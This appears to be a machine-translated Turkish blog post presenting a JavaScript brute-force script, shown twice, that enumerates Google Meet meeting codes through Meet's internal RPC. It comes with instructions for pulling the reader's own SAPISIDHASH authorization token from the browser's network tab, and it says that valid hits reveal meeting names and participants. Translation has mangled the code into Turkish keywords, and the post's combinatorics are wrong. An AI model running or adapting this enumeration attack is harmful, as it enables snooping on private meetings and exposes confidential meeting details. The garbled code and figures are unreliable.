Visio – Google Meet | Dyrk, Dyna Meet – Visio

Visio ile tanışın

Contents

1 Visio ile tanışın
- 1.1 Dyrk
- 1.2 Visio ile tanışın

randomize = () => dico = dico.Bölmek (”).Harita (değer => ((< value, sort: Math.random() >)).büyü ((a, b) => a.Büyü – B.hecelemek).HARİTA ((< value >) => değer).Katılmak (”),
Newpaternkey = () => “xxx-xxxx-xxx”.Bölmek (”).Harita (c => c == ‘-‘?C: String.From Charcode (Matematik.Zemin (Matematik.Random ()*25) +97)).Katılmak (”),
Key = newpaternkey (), sayaç = 20;
Next = () => Anahtar.Bölmek (”).Harita (e => e == ‘-‘ ? E: Dico [Dico.İndexof (e) + 1> = dico.uzunluk ? 0: DICO.İndexof (e) + 1]).Katılmak (”),
Counter = 0;
Meetlink = ‘https: // buluş.Google.com/’, mevcut TOE = () => xhr = yeni xmlHTTPRequest ();
Eğer (sayacı ++> = 20) sayaç = 0;
Key = newPaternkey ();
Randomize ();
>
Key = Next ();
XHR.Open (‘Get’, MeetLink + Key);
XHR.Addeventlisner (‘yük’, (e) => getir (MeetLink.Concat (“/$ rpc/google.RTC.toplantılar.V1.MeetingsPaceservice/ResolVemeetingspace “,” başlıklar “:” Yetkilendirme “: Yetkilendirme,
“İçerik Tipi”: “Uygulama/X-Protobuf”,
“X-goog-adep-anahtar”: e.hedef.sorumluluk.Match (/\ [“https \: \/\/buluşma \.Google\.com \ “\,” ([a-za-z0-9 \ _ \-]) “\]/) [1],
“X-Goog-authuse”: “0”,
“X-goog-icode-réspose-if-icututable”: “Base64”,
“X-Goog-Meeting-tanımlayıcı”: btoa (‘\ b \ x02 \ x12 \ f’.Concat (Anahtar)),
>,
“Beden”: “\ n \ f”.Concat (anahtar, “0 \ u0001”),
“Yöntem”: “Post”
>).Sonra (e => e.Metin ())
.Sonra (e => setTimeout (mevcut, 100);
konsol.Log (MeetLink.Concat (Anahtar).BeautifyDisplay (38), (E.Değiştirin (/[^a-za-z0-9]/g, “”)+””).BeautifyDisplay (38));
>);
>);
XHR.Göndermek ();
>;
Sicim.prototip.BeautifyDisplay = Function (boyut) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >boyut ? TXT.Uzunluk: boyut)).Substr (0, boyut).Concat (‘|’); >,
konsol.Temizlemek ();
mevcut ();
>) ()

Dyrk

Şu anda siber güvenlik alanında çalışıyor, düzenli olarak oldukça önemsiz durumlarla karşılaşıyorum.

En son, bir toplantı sırasında bir kişinin izinsiz girişi .
Neyse ki, güvenlik için Google Meet, hem katılımcıları bir kişinin video konferansa katılmayı amaçladığı konusunda hem de kabul etmesini veya reddetmesini sağlayan bir özellik içeriyordu.

Ancak, bu olay beni kendime bir dizi soru sormaya getiriyor .

Google Meet Link’in karmaşıklığı

Her şeyden önce, bir kişinin davet edilmeden bir buluşma bağlantısına bağlanması nasıl mümkün olabilir? ?

Bağlantının sadeliğini göz önünde bulundurmalıyız: https: // google.tanışmak.com/Xxx -yyyy -zzzz

Xxx -yyyy -zzzz sadece A ve Z arasındaki alfabetik karakterlerdir, yani her karakter için 27 olası kombinasyon.

Matematikçiler için:

27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 Olası kombinasyonlar .

Bir Google Meet bağlantısının ömrü

Artık “Google Meet” konferans bağlarımızın bağlantılarının nasıl oluşturulduğunu daha iyi anlayabilmemize rağmen, dikkate alınması gereken çok önemli bir husus var . Bir Google Meet bağlantısının ömrü !

Gerçekten herkes Google toplantıları birkaç tıklamayla oluşturabilir.
Ama birkaç gün, haftalar veya aylar sonra . Bağlantılar artık geçerli değil.

Bu nedenle oluşturulan bağlantıların belirli bir geçerlilik dönemi vardır .

İstisna “tekrarlayan” olaylar yapın ve burası ilginç hale geliyor.
İş dünyasında, düzenli olarak organize etmek için birçok fırsat vardır (ekip / iş, günlük, haftalık, aylık,, . )).
Bir çalışan bu tür bir etkinliği gündemlerinde oluşturduğunda, otomatik olarak bir Google Meet bağlantısı oluşturulur. Bu değişmez.
Yani bu olay için her seferinde aynı bağlantıya sahip olacaksınız.

Biraz JavaScript ve Brute Force ile ?

Tüm bu unsurlarla, şimdi tüm olasılıkları süpürmek için donanımlıyız ve videokokasyonlara bağlantıları tespit etmek için yüksek bir olasılıklara ulaşıyoruz !

Bu yüzden, sonsuz sayıda kombinasyonu deneyecek bir JavaScript kodu yazmak için Google Meet’in çalışmasını biraz retro-sigortaladım

(C) Dyrk.Org 2023-2024 – Meet’s Rulette
(1) Bu komut dosyasını https: // google adresinde çalıştırın.tanışmak.com

(2) Googles’inizin “XHR istekleri” başlıklarında geçerli bir yetkilendirme jetonu ile yetkilendirmenin değişkenini bulun ve güncelleyin

İzin versin = “SapisiDhash xxxxxxxxxxxxxx_xxxxxxxxxxxxxxxxxxxxxxxxxx“, dico =” abcdefghijklmnopqrstuvxz “,

randomize = () => dico = dico.Bölmek (”).Harita (değer => ((< value, sort: Math.random() >)).büyü ((a, b) => a.Büyü – B.hecelemek).HARİTA ((< value >) => değer).Katılmak (”),
Newpaternkey = () => “xxx-xxxx-xxx”.Bölmek (”).Harita (c => c == ‘-‘?C: String.From Charcode (Matematik.Zemin (Matematik.Random ()*25) +97)).Katılmak (”),
Key = newpaternkey (), sayaç = 20;
Next = () => Anahtar.Bölmek (”).Harita (e => e == ‘-‘ ? E: Dico [Dico.İndexof (e) + 1> = dico.uzunluk ? 0: DICO.İndexof (e) + 1]).Katılmak (”),
Counter = 0;
Meetlink = ‘https: // buluş.Google.com/’, mevcut TOE = () => xhr = yeni xmlHTTPRequest ();
Eğer (sayacı ++> = 20) sayaç = 0;
Key = newPaternkey ();
Randomize ();
>
Key = Next ();
XHR.Open (‘Get’, MeetLink + Key);
XHR.Addeventlisner (‘yük’, (e) => getir (MeetLink.Concat (“/$ rpc/google.RTC.toplantılar.V1.MeetingsPaceservice/ResolVemeetingspace “,” başlıklar “:” Yetkilendirme “: Yetkilendirme,
“İçerik Tipi”: “Uygulama/X-Protobuf”,
“X-goog-adep-anahtar”: e.hedef.sorumluluk.Match (/\ [“https \: \/\/buluşma \.Google\.com \ “\,” ([a-za-z0-9 \ _ \-]) “\]/) [1],
“X-Goog-authuse”: “0”,
“X-goog-icode-réspose-if-icututable”: “Base64”,
“X-Goog-Meeting-tanımlayıcı”: btoa (‘\ b \ x02 \ x12 \ f’.Concat (Anahtar)),
>,
“Beden”: “\ n \ f”.Concat (anahtar, “0 \ u0001”),
“Yöntem”: “Post”
>).Sonra (e => e.Metin ())
.Sonra (e =>

SetTimeout (mevcut, 100);
konsol.Log (MeetLink.Concat (Anahtar).BeautifyDisplay (38), (E.Değiştirin (/[^a-za-z0-9]/g, “”)+””).BeautifyDisplay (38));
>);
>);
XHR.Göndermek ();
>;
Sicim.prototip.BeautifyDisplay = Function (boyut) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >boyut ? TXT.Uzunluk: boyut)).Substr (0, boyut).Concat (‘|’); >,
konsol.Temizlemek ();
mevcut ();
>) ()

Tüm bunları çalıştırmak için gerekli olacaktır:

Sayfayı aç https: // buluş.Google.com
Geliştirici Konsolunu Aç
“Ağ” sekmesinde, Getir / XHR’yi süzün ve bir jeton jetonunu kurtar“Yetki”
Yukarıdaki kaynak kodu kopyalayıp yapıştırın ve yerine koyun belirteci belirtti.
Klavyenizdeki “Giriş” anahtarıyla doğrulayın.

“Yetkilendirme” jetonunun kurtarılması:

Merak için, bu senaryoların sonucunun böyle görünmesi gereken şey budur.
Bu nedenle, video konferans alanının mevcut olmadığını bildiren satırları not ediyoruz.
Ve bizi konferansın jetonunu koyan diğerleri ! Bu nedenle bağlantının geçerli olduğunu belirtir;)

Ancak, bir buluşma bağlantısında birkaç saniye içinde düşmeyi beklemeyin ^^
(Biraz şanslı bir adam değilseniz)
En az yarım saat çalışmasına izin vererek büyük sabır olmanız gerekecek.

Çözüm

Geçerli bir Google Meet bağlantısı bulmak için Loto kazanmaktan daha fazla şansın olduğunu panik yapmayın.

Dikkat ! Bağlanmaya gerek kalmadan belirli bilgilere geçerli bir buluşma bağlantısı ile karşılaşan bir kişi:
Toplantının adı (bu nedenle gizli bilgileri kaymaktan kaçının) ve bağlı katılımcılar (tüm veya oyun).

Visio ile tanışın

Çevrimiçi soygun

En çok satan çıkartma çevrimiçi soygun

oyuncu